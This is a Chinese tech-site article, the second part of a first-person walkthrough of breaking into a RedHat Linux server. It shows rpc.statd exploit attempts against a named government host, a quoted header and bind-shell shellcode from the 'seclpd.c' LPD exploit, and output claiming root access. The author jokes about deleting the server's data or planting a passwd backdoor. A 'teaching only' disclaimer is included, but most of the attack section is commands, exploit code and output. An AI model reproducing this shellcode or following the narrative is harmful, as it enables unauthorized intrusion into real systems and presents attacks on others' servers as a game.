科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道RedHat Linux 操作系统的入侵实例(2)

RedHat Linux 操作系统的入侵实例(2)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

写此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。本文主要是围绕UNIX下面的一个小小的服务进程(LPD:网络打印服务)的攻击而进行的。

作者:论坛整理 来源:zdnet网络安全 2007年12月18日

关键字: 系统安全 系统入侵 Linux redhat

  • 评论
  • 分享微博
  • 分享邮件
看来并不支持RH7。怎么办??让俺把0-2全部试试看再说!start……

bash-2.04$stat -d 0 www.fbi.gov.tw
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21 

哈哈受到挫折,再试……

bash-2.04$stat -d 1 www.fbi.gov.tw
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21

一样!继续……

bash-2.04$stat -d 1 www.fbi.gov.tw
buffer: 0xbffff314 length: 999 (+str/+nul)
target: 0xbffff718 new: 0xbffff56c (offset: 600)
wiping 9 dwords
Failed - statd returned res_stat: (failure) state: 21

我烤!!烤烤烤!rpc.statd行不通啊!让我想想看……RH7应该有个远程溢出……好像是lp服务造成的。让俺去找找看。哈哈~~找到了……“seclpd.c”应该是这个东东了。 以下程序也可以在黑盟下载。


—————以下代码仅供教学使用,决不能用来进行恶意攻击—————
/*
* Welcome to http://hlc.cnroot.com/
* Run: ./SEClpd victim brute -t type 
* Try first ./SEClpd victim -t 0 then try the brute. 
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define ADDRESS_BUFFER_SIZE 32+4
#define APPEND_BUFFER_SIZE 52
#define FORMAT_LENGTH 512-8
#define NOPCOUNT 200
#define SHELLCODE_COUNT 1030
#define DELAY 50000 /* usecs */ 
#define OFFSET_LIMIT 5000

char shellcode[] = 
"\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

哈哈~~brute暴力破解。看你出不出shell!现在要等上一会儿……去泡杯coffee慢慢来。(什么!没coffee?tea!这个也行!)…………过了大约一杯coffee的时间。也就是5-8分钟左右,就会有结果了。(什么!什么!5-8分钟你喝了5杯!我倒~~~)……出来了。哈哈~~

- [+] shell located on www.fbi.gov.tw
- [+] Enter Commands at will

Linux FBI.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown
uid=0(root) gid=7(lp)

Well……哈哈~uid=0(root)哇哈哈哈哈…………先在你是root啦!可以为所欲为了~~把它的东西全部删了~~哈哈……太过火了~~还是在passwd中加个后门算了~~至于怎么加,这就不在本文的范围内了……^___^

Good Luck………………


    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章